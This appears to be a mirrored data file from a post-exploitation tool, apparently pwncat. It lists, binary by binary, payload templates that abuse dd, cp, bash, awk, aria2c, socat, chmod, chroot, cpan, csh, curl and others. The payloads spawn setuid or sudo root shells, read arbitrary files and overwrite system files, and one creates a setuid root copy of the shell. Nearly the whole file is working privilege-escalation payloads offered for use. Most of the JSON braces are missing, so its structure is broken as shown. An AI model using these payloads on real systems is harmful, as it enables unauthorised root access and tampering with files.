mirror of
synced 2024-11-27 19:04:15 +01:00
492 lines
13 KiB
492 lines
13 KiB
// Each item is a list of capabilities for this binary
"dd": [
// This is a read capability
"type": "read",
// No other commands need to be executed besides the command
// "command" exands to the binary path and any arguments provided
// If the data needs to be dealt with earlier, you can use "{data}"
// here.
"payload": "{command} 2>/dev/null",
// This is used to pass arguments to the application (auto-merged
// into "{command}".
"args": ["if={lfile}"],
// Prepends arguments, if any to the "args" for setuid context.
"suid": [],
// Input which needs to be passed to the application. All insertions
// work here (such as {lfile}, {command}), but also {data} if you are
// streaming the data to the remote application.
"input": "",
// If needed, specify some data that must be sent to exit the remote
// application after the read is finished.
// "exit": "{ctrl_c}",
// This specifies how to handle the data. There can be a few
// different values here:
// - raw -> the data is unchanged and the controlling terminal
// is set to raw mode for effective reading. This mode
// requires a known data length and the command will fail
// without it.
// - print -> the data is unchanged, but the controlling
// terminal is not changed to raw mode. Only printable
// data is safe from TTY translation.
// - base64 -> all data is converted from base64. Data sent
// to the remote process should be in base64 form, and the
// tty is not set to raw mode.
// - hex -> same as base64, but base16 instead.
"stream": "raw"
"type": "write",
"stream": "raw",
"payload": "{command} 2>/dev/null",
"args": ["of={lfile}", "iflag=count_bytes,fullblock", "count={length}"]
"type": "write",
"stream": "print",
"payload": "{command} 2>/dev/null",
"args": ["of={lfile}"],
"exit": "{ctrl_d}"
"cp": [
"type": "write",
"stream": "print",
// This is weird because under the case where we are running w/ sudo,
// we need to ask for the password first. The first "{command}" will
// ask for the sudo password, then fail to copy. The second "{command}"
// will not ask for the sudo password, and then the copy will succeed.
// Without sudo, the first command will simply fail, and the second
// will succeed. This is the same for the other `cp` payload below.
"payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {cat} > $TF; {command}; rm -f $TF",
"args": ["$TF", "{lfile}"],
"exit": "{ctrl_d}"
"type": "write",
"stream": "base64",
"payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {base64} -d > $TF; {command}; rm -f $TF",
"args": ["$TF", "{lfile}"],
"exit": "{ctrl_d}"
// Another example
"bash": [
"type": "shell",
"stream": "print",
"suid": ["-p"],
"exit": "exit"
"type": "read",
"stream": "raw",
"payload": "{command}",
"args": ["-c", "'{cat} {lfile}'"],
"suid": ["-p"]
"type": "write",
"stream": "base64",
"payload": "{command}",
"args": ["-c", "'{base64} -d > {lfile}'"],
"suid": ["-p"],
"exit": "{ctrl_d}{ctrl_d}"
"dash": [
"type": "shell",
"stream": "print",
"suid": ["-p"],
"exit": "exit"
"type": "read",
"stream": "print",
"payload": "{command} -c '{cat} {lfile}'",
"suid": ["-p"],
"exit": "{ctrl_d}"
"type": "write",
"stream": "base64",
"payload": "{command} -c '{base64} -d > {lfile}'",
"suid": ["-p"],
"exit": "{ctrl_d}"
"cat": [
"type": "read",
"stream": "raw",
"payload": "{command} {lfile}"
"apt": [
"type": "shell",
"args": ["changelog", "apt"],
"input": "!{shell}\n",
"exit": "exit\nq\n"
"apt-get": [
"type": "shell",
"args": ["changelog", "apt"],
"input": "!{shell}\n",
"exit": "exit\nq\n"
"aria2c": [
"type": "shell",
"payload": "export TF=$({mktemp}); export SH=$({mktemp}); {cp} {shell} $SH; echo \"{chown} root:root $SH; {chmod} +sx $SH\" > $TF; {chmod} +x $TF; {command}; sleep 1; $SH -p",
"input": "rm $TF; rm $SH; unset TF; unset $SH;\n",
"args": ["--on-download-error=$TF", "http://x"],
"exit": "exit"
"ash": [
"type": "shell",
"stream": "print",
"suid": ["-p"],
"exit": "exit"
"type": "read",
"stream": "print",
"payload": "{command} -c '{cat} {lfile}'",
"suid": ["-p"],
"exit": "{ctrl_c}"
"type": "write",
"stream": "base64",
"payload": "{command} -c '{base64} -d > {lfile}'",
"suid": ["-p"],
"exit": "{ctrl_c}"
"awk": [
"type": "shell",
"payload": "{command} 'BEGIN {{system(\"{shell} -p\")}}'",
"exit": "exit"
"type": "read",
"stream": "print",
"payload": "{command} // {lfile}"
"type": "read",
"stream": "raw",
"payload": "{command} 'BEGIN {{system(\"{cat} {lfile}\")}}'"
"type": "write",
"stream": "print",
"args": [
"-v", "LFILE={lfile}",
"'BEGIN {{ printf \"\" > LFILE; while ((getline) > 0){{ print >> LFILE }}'"
"gawk": [
"type": "shell",
"payload": "{command} 'BEGIN {{system(\"{shell} -p\")}}'",
"exit": "exit"
"type": "read",
"stream": "print",
"payload": "{command} // {lfile}"
"type": "read",
"stream": "raw",
"payload": "{command} 'BEGIN {{system(\"{cat} {lfile}\")}}'"
"type": "write",
"stream": "print",
"args": [
"-v", "LFILE={lfile}",
"'BEGIN {{ printf \"\" > LFILE; while (getline > 0){{ print >> LFILE; }}}}'"
"exit": "{ctrl_d}"
"base32": [
"type": "read",
"stream": "raw",
"payload": "{command} {lfile} | {base32} -d",
"args": []
"base64": [
"type": "read",
"stream": "raw",
"payload": "{command} {lfile} | {base64} -d",
"args": []
"bpftrace": [
"type": "shell",
"args": ["-c", "'{shell} -p'", "-e", "'END {{exit()}}'"],
"suid": ["-p"],
"exit": "exit"
"busctl": [
"type": "shell",
"input": "!{shell}\n",
"exit": "exit\nq\n"
"byebug": [
"type": "shell",
"payload": "TF=$({mktemp}); echo 'system(\"{shell}\")' > $TF; {command}",
"args": ["--no-stop", "-q", "$TF"],
"exit": "exit\n"
"type": "read",
"payload": "TF=$({mktemp}); echo 'system(\"{cat} {lfile}\")' > $TF; {command}",
"args": ["--no-stop", "-q", "$TF"],
"exit": "exit\n"
"socat": [
"type": "shell",
"payload": "{command}",
"args": ["STDIN", "EXEC:{shell}"],
"exit": "exit\n"
"type": "read",
"payload": "{command}",
"args": ["-u", "FILE:{lfile}", "STDOUT"]
"type": "write",
"stream": "print",
"payload": "{command} 2>/dev/null",
"args": ["-u", "STDIN", "CREATE:{lfile}"],
"exit": "{ctrl_d}"
"type": "write",
"stream": "base64",
"payload": "{base64} -d | {command} 2>/dev/null",
"args": ["-u", "STDIN", "CREATE:{lfile}"],
"exit": "{ctrl_d}"
"chmod": [
"type": "shell",
"payload": "{command}",
"args": ["+s", "{shell}; {shell} -p"],
"exit": "exit\n"
"type": "read",
"payload": "{command} 2>/dev/null",
// This is used to pass arguments to the application (auto-merged
// into "{command}".
"args": ["+s", "{dd};", "{dd}", "if={lfile}"],
// Prepends arguments, if any to the "args" for setuid context.
"stream": "raw"
"type": "write",
"stream": "raw",
"payload": "{command} 2>/dev/null",
"args": ["+s", "{dd};", "{dd}", "of={lfile}", "iflag=count_bytes,fullblock", "count={length}"]
"type": "write",
"stream": "print",
"payload": "{command} 2>/dev/null",
"args": ["+s", "{dd};", "{dd}", "of={lfile}"],
"exit": "{ctrl_d}"
"chroot": [
"type": "shell",
"payload": "{command}",
"args": ["/", "{shell}", "-p"],
"exit": "exit\n"
"cobc": [
"type": "shell",
"payload": "TF=none; {command} 2>/dev/null; TF=$({mktemp}); echo 'CALL \"SYSTEM\" USING \"exec {shell} -p\".' > $TF; {command} 2>&1; rm -f $TF",
"args": ["-xFj", "--frelax-syntax-checks", "$TF"],
"exit": "exit\n"
// Could we do some file_read and file_write with this too..? We can run cobol...
"cpan": [
"type": "shell",
"payload": "{command}",
"input" : "! system(\"{shell} -p\")\n",
// exit the shell, AND exit cpan
"exit": "exit\nexit\n"
// Could we do some file_read and file_write with this too? We can run perl...
"cpulimit": [
"type": "shell",
"payload": "{command}",
"args": ["-l", "100", "-f", "\"{shell}\""],
// exit the shell, AND exit cpan
"exit": "exit\n"
// We cannot seem to pass other arguments to process ran, so no read/write (???)
"crash": [
"type": "shell",
"payload": "{command}",
"args": ["-h"],
"input": "!{shell} -p\n",
// exit the shell, AND exit cpan
"exit": "exit\nq\n"
// We cannot seem to pass other arguments to process ran, so no read/write (???)
"csh": [
"type": "shell",
"payload": "{command}",
"suid": ["-b"],
"input": "{shell} -p\n",
// exit the shell, AND exit csh
"exit": "exit\nexit\n"
"type": "read",
"stream": "print",
"payload": "{command}",
// "suid" is not supplied because it must be very last argument
"args": ["-c", "\"{cat} {lfile}\"", "-b"]
// Using write, it doesn't get the entire text to clobber /etc/passwd
// {
// "type": "write",
// "stream": "base64",
// "payload": "{command}",
// "args": ["-c", "\"{base64} -d > {lfile}\"", "-b"],
// // "suid" is not supplied because it must be very last argument
// "exit": "{ctrl_d}"
// }
"bsd-csh": [
"type": "shell",
"payload": "{command}",
"input": "{shell} -p\n",
"suid": ["-b"],
// exit the shell, AND exit csh
"exit": "exit\nexit\n"
"type": "read",
"stream": "print",
"payload": "{command}",
// "suid" is not supplied because it must be very last argument
"args": ["-c", "\"{cat} {lfile}\"", "-b"]
// Using write, it doesn't get the entire text to clobber /etc/passwd
// {
// "type": "write",
// "stream": "base64",
// "payload": "{command}",
// "args": ["-c", "\"{base64} -d > {lfile}\"", "-b"],
// // "suid" is not supplied because it must be very last argument
// "exit": "{ctrl_d}"
// }
"curl": [
"type": "read",
"stream": "raw",
"payload": "{command}",
"args": ["-s", "file://{lfile} --output -"]
"type": "read",
"stream": "base64",
"payload": "{command}",
"args": ["-s", "file://{lfile} --output - | {base64} -w 0"]
"type": "write",
"stream": "print",
// This is weird because under the case where we are running w/ sudo,
// we need to ask for the password first. The first "{command}" will
// ask for the sudo password, then fail. The second "{command}"
// will not ask for the sudo password, and then the copy will succeed.
// Without sudo, the first command will simply fail, and the second
// will succeed. This is the same for the other payload below.
"payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {cat} > $TF; {command}; rm -f $TF",
"args": ["-s", "file://$TF --output {lfile}"],
"exit": "{ctrl_d}"
"type": "write",
"stream": "base64",
"payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {base64} -d > $TF; {command}; rm -f $TF",
"args": ["-s", "file://$TF --output {lfile}"],
"exit": "{ctrl_d}"
} |